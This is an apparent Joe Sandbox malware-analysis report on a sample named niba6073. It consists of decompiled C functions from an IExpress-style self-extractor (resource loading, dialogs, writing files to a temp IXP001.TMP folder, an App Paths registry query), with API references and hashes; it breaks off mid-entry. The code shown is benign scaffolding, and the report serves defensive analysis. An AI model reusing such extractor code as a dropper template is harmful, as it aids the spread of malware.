APIs

GlobalFree.KERNEL32 ref: 00072A6F

Part of subcall function 00072773: CharUpperA.USER32(A87CF02E,00000000,00000000,00000000), ref: 000727A8
Part of subcall function 00072773: CharNextA.USER32(0000054D), ref: 000727B5
Part of subcall function 00072773: CharNextA.USER32(00000000), ref: 000727BC
Part of subcall function 00072773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00072829
Part of subcall function 00072773: RegQueryValueExA.ADVAPI32(?,00071140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00072852
Part of subcall function 00072773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00072870
Part of subcall function 00072773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000728A0

GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00073938,?,?,?,?,-00000005), ref: 00072958
GlobalLock.KERNEL32 ref: 00072969
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00073938,?,?,?,?,-00000005,?), ref: 00072A21
GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00072A81

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
String ID:
API String ID: 3949799724-0
Opcode ID: 8e0c1f1aa32bb7609ea4ec81dcd57dade7021cf3ce8cb08421ce10460b11026d
Instruction ID: 0656aad1b7058a4b95c734fe2cba168b8fe054c8241d84950144b9c9aaefea9e
Opcode Fuzzy Hash: 8e0c1f1aa32bb7609ea4ec81dcd57dade7021cf3ce8cb08421ce10460b11026d
Instruction Fuzzy Hash: 54512B31E00219EFDB21DF98C884AEEBBF5FF48700F14812AE909E3251D7399941DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00074169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00074169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E0007468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E0007468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E000744B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E000744B9(0, 0x4b5, 0, 0, 0x10, 0);
			}

0x0007417d
0x0007418f
0x00074193
0x000741b7
0x000741d3
0x000741e6
0x00000000
0x000741e7
0x000741d5
0x000741d6
0x000741d8
0x000741d9
0x000741da
0x000741df
0x000741e1
0x00000000
0x000741e1
0x000741b9
0x000741ba
0x000741bc
0x000741bd
0x000741be
0x00000000
0x000741be
0x00000000

APIs

Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746A0
Part of subcall function 0007468F: SizeofResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746A9
Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746C3
Part of subcall function 0007468F: LoadResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746CC
Part of subcall function 0007468F: LockResource.KERNEL32(00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746D3
Part of subcall function 0007468F: memcpy_s.MSVCRT ref: 000746E5
Part of subcall function 0007468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000746EF

LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,000730B4), ref: 00074189
LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,000730B4), ref: 000741E7

Part of subcall function 000744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00074518
Part of subcall function 000744B9: MessageBoxA.USER32(?,?,siga30,00010010), ref: 00074554

Strings

<None>, xrefs: 000741C5
FINISHMSG, xrefs: 00074173, 000741AB

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$FINISHMSG
API String ID: 3507850446-3091758298
Opcode ID: 9432a022dcf7f679a30e57ec1742e30e59dec1c5380e6ab2a8d4d0141d342075
Instruction ID: 5fabc3cc8253fd2d17ff11469ab092c6d4eebbffde9fc294e8d3183a8abdcbf4
Opcode Fuzzy Hash: 9432a022dcf7f679a30e57ec1742e30e59dec1c5380e6ab2a8d4d0141d342075
Instruction Fuzzy Hash: DE01ADB1F002243BF32426698C86FBB218EDBD6795F40C025B70DE11C19B6CCC4141BD

Uniqueness

Uniqueness Score: -1.00%

Function 00077155 Relevance: 7.6, APIs: 5, Instructions: 51
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00077155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x78004; // 0xa87cf02e
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x78004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x78004 = _t39;
				}
				_t37 =  !_t36;
				 *0x78008 = _t37;
				return _t37;
			}

0x0007715d
0x00077161
0x00077165
0x00077178
0x00077182
0x0007718e
0x00077197
0x000771a0
0x000771b1
0x000771b8
0x000771c4
0x000771c7
0x000771cb
0x000771d5
0x000771da
0x000771da
0x000771dc
0x000771dc
0x000771e2
0x000771e5
0x000771ee

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00077182
GetCurrentProcessId.KERNEL32 ref: 00077191
GetCurrentThreadId.KERNEL32 ref: 0007719A
GetTickCount.KERNEL32 ref: 000771A3
QueryPerformanceCounter.KERNEL32(?), ref: 000771B8

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 7ee1eaeb9b92564e6cfdac8649a5ec797e57b7154cdf3ac69a5d52f2db54aed0
Instruction ID: 5ee953d48431efa9621df9c998e12a1f8220100f791f113c69c7bfe84e6ec37d
Opcode Fuzzy Hash: 7ee1eaeb9b92564e6cfdac8649a5ec797e57b7154cdf3ac69a5d52f2db54aed0
Instruction Fuzzy Hash: 73111F71E05208DFEB50DFB8DA4869EB7F4EF49315F918465D809E7210DA3C9A44CB45

Uniqueness

Uniqueness Score: -1.00%

Function 000719E0 Relevance: 7.6, APIs: 5, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E000719E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0x78004; // 0xa87cf02e
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E000743D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0x79a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E00076CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x000719e0
0x000719e0
0x000719eb
0x000719f2
0x000719f9
0x000719fc
0x00071a01
0x00071a2a
0x00071a2e
0x00071a3e
0x00071a4f
0x00071a62
0x00071a6a
0x00000000
0x00071a03
0x00071a06
0x00071a20
0x00071a20
0x00071a08
0x00071a08
0x00071a14
0x00000000
0x00071a16
0x00071a18
0x00071a70
0x00071a72
0x00071a72
0x00071a14
0x00071a06
0x00071a81

APIs

EndDialog.USER32(?,?), ref: 00071A18
GetDesktopWindow.USER32 ref: 00071A24
LoadStringA.USER32(?,?,00000200), ref: 00071A4F
SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00071A62
MessageBeep.USER32(000000FF), ref: 00071A6A

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: 571a04c7fdfa1f06892e5e1928a3065a5963201d4441975d39e4085a8c5eefeb
Instruction ID: 493a274fded918e32ca6ad1b3d172b7916399177d160c13f16dae01eb42b00cf
Opcode Fuzzy Hash: 571a04c7fdfa1f06892e5e1928a3065a5963201d4441975d39e4085a8c5eefeb
Instruction Fuzzy Hash: 3311A931E01109AFEB10DF68DD08AED77B4FF85311F508164F91AA61D1DA3C9E41CB96

Uniqueness

Uniqueness Score: -1.00%

Function 000763C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E000763C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0x78004; // 0xa87cf02e
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E00071781( &_v268, 0x104, __ecx, "C:\Users\engineer\AppData\Local\Temp\IXP001.TMP\");
				E0007658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0x79124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0x79124 = 0x80070052;
					_t37 = 0;
				}
				return E00076CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}

0x000763cb
0x000763d2
0x000763d8
0x000763ea
0x000763f3
0x00076401
0x00076402
0x00076410
0x00076415
0x00076433
0x00076438
0x00076449
0x00076463
0x0007646d
0x00076477
0x00076477
0x0007647a
0x0007643a
0x0007643a
0x00076444
0x00076444
0x00076492

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0007642D
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0007645B
CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0007647A

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 000763EB

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 1065093856-3699071305
Opcode ID: 0fdd3b050529e1c6be5d284a17cf314b2bcf53111c46b6dbf93949bfab765bae
Instruction ID: 923b083571e2656b4f364b217540e7fa6016184b4770678c841fcf21fc6f7b52
Opcode Fuzzy Hash: 0fdd3b050529e1c6be5d284a17cf314b2bcf53111c46b6dbf93949bfab765bae
Instruction Fuzzy Hash: FA21D571E00218ABEB10DF25DC85FEB77B8EB85314F008169F589A3180DABD5DC48FA8

Uniqueness

Uniqueness Score: -1.00%

Function 000747E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000747E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E00071680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0x791e0; // 0x29e7cd0
						 *(_t34 + 4) = _t11;
						 *0x791e0 = _t34;
						return 1;
					}
					_t25 =  *0x78584; // 0x0
					E000744B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0x78584; // 0x0
				E000744B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}

0x000747e8
0x000747f0
0x000747f4
0x0007480f
0x00074811
0x00074814
0x00074814
0x00074816
0x00074817
0x00074829
0x0007482b
0x0007482f
0x0007484f
0x00074852
0x00074855
0x00074855
0x00074857
0x00074858
0x00074860
0x00074865
0x0007486a
0x0007486f
0x00000000
0x00074876
0x00074831
0x00074841
0x00074847
0x0007480b
0x00000000
0x0007480b
0x000747f6
0x00074806
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00074E6F), ref: 000747EA
LocalAlloc.KERNEL32(00000040,?), ref: 00074823
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00074847

Part of subcall function 000744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00074518
Part of subcall function 000744B9: MessageBoxA.USER32(?,?,siga30,00010010), ref: 00074554

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00074851

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Local$Alloc$FreeLoadMessageString
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 359063898-3699071305
Opcode ID: d8a42f119e05ef429c4bd953372e66e97d2b444874b4da2ea36d271885e42c1a
Instruction ID: c2be603df8fbf1efce5c6261dc58c8775f21486a78d0a2a75122c75c7361fd39
Opcode Fuzzy Hash: d8a42f119e05ef429c4bd953372e66e97d2b444874b4da2ea36d271885e42c1a
Instruction Fuzzy Hash: 681106B5E046416FE7A49F249C18FBA3B9AEBC6300B04C519F94AA7341DF3D8C068764

Uniqueness

Uniqueness Score: -1.00%

Function 00076517 Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00076517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0x79a3c; // 0x70000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E000744B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t24 = _a16;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}

0x0007651f
0x0007652a
0x00076534
0x0007656b
0x00076577
0x0007657c
0x00076536
0x0007653e
0x00076542
0x00000000
0x00076544
0x00076547
0x0007654c
0x00076549
0x00076549
0x00076549
0x0007655e
0x00076560
0x00076569
0x00000000
0x00000000
0x00076569
0x00076542
0x00076587

APIs

FindResourceA.KERNEL32(00070000,000007D6,00000005), ref: 0007652A
LoadResource.KERNEL32(00070000,00000000,?,?,00072EE8,00000000,000719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00076538
DialogBoxIndirectParamA.USER32(00070000,00000000,00000547,000719E0,00000000), ref: 00076557
FreeResource.KERNEL32(00000000,?,?,00072EE8,00000000,000719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00076560

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID:
API String ID: 1214682469-0
Opcode ID: a76703ef2b1ec25c687657f1e3304cc79af67b3f9c4e01151720978a98a38062
Instruction ID: 13334234b95325a01605899ff26ca7c4f4e961bd3a46ece5303bee0f460a9e82
Opcode Fuzzy Hash: a76703ef2b1ec25c687657f1e3304cc79af67b3f9c4e01151720978a98a38062
Instruction Fuzzy Hash: 5C012B72A00905BBEB105F599C08DBF7AACEBC6761F044115FE09A3150D77ECC50D6E5

Uniqueness

Uniqueness Score: -1.00%

Function 00073680 Relevance: 6.1, APIs: 4, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00073680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}

0x0007368c
0x0007368f
0x00073691
0x0007369f
0x000736a7
0x00000000
0x00000000
0x000736ba
0x00000000
0x000736bc
0x000736bc
0x000736c0
0x000736cb
0x000736c2
0x000736c4
0x000736c4
0x000736da
0x000736e0
0x000736e6
0x00000000
0x00000000
0x000736e6
0x00000000
0x000736ba
0x000736ed

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0007369F
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000736B2
DispatchMessageA.USER32(?), ref: 000736CB
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000736DA

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: 37899d1703ee66beba513cd3a239e7adf8e5b7577c3697034c0c254e821c1cf3
Instruction ID: 9993843c4386ad18ed490067c87e65c45e6da2a5300e3386c01787b2f0cc9e6b
Opcode Fuzzy Hash: 37899d1703ee66beba513cd3a239e7adf8e5b7577c3697034c0c254e821c1cf3
Instruction Fuzzy Hash: 15018472E402547BFB304AA65C48EEF76BCEBC6B11F10811DB909E2180D5689640D674

Uniqueness

Uniqueness Score: -1.00%

Function 000765E8 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E000765E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}

0x000765e8
0x000765ed
0x000765ef
0x000765f2
0x000765f4
0x000765f4
0x000765f6
0x000765f7
0x00076608
0x00076611
0x00076618
0x0007661c
0x00000000
0x00000000
0x0007660e
0x00076623
0x00076625
0x0007663b
0x0007663b
0x0007663d
0x00076641
0x00076610
0x00076610
0x00000000
0x00076610
0x00076644
0x00076647
0x00076647
0x00076621
0x00000000
0x00000000
0x00000000

APIs

CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00072B33), ref: 00076602
CharPrevA.USER32(?,00000000), ref: 00076612
CharPrevA.USER32(?,00000000), ref: 00076629
CharNextA.USER32(00000000), ref: 00076635

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: 5ba0d406f0c6ac42f312783d455f0d55fa55d63fd52fcf5c720274e10a0f2870
Instruction ID: 8d4e4dfe46934184f40102c97e2ab35356cc6b1fb1f686d56c01fed348634176
Opcode Fuzzy Hash: 5ba0d406f0c6ac42f312783d455f0d55fa55d63fd52fcf5c720274e10a0f2870
Instruction Fuzzy Hash: 36F04931D048406EF7320B398C888BBAFDCCBC7255B59417FE88F92000D61E0D468665

Uniqueness

Uniqueness Score: -1.00%

Function 000769B0 Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000769B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0x781f8 = E00076C70();
				__set_app_type(E00076FBE(2));
				 *0x788a4 =  *0x788a4 | 0xffffffff;
				 *0x788a8 =  *0x788a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0x78528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0x7851c; // 0x0
				 *_t5 = _t12;
				_t6 = E00077000();
				if( *0x78000 == 0) {
					__setusermatherr(E00077000);
				}
				E000771EF(_t6);
				return 0;
			}

0x000769b7
0x000769c2
0x000769c8
0x000769cf
0x000769d8
0x000769de
0x000769e4
0x000769e6
0x000769ec
0x000769f2
0x000769f4
0x00076a00
0x00076a07
0x00076a0d
0x00076a0e
0x00076a15

APIs

Part of subcall function 00076FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00076FC5

__set_app_type.MSVCRT ref: 000769C2
__p__fmode.MSVCRT ref: 000769D8
__p__commode.MSVCRT ref: 000769E6
__setusermatherr.MSVCRT ref: 00076A07

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: 88ef6cbd1883a18f57c7f400eab25a582aaf2aa2fe493c2989759d0c850b908f
Instruction ID: 2a8a1b85ed346d95ef9fe2cf5849a885a54273e8f050acb68e1873cbd46b37b8
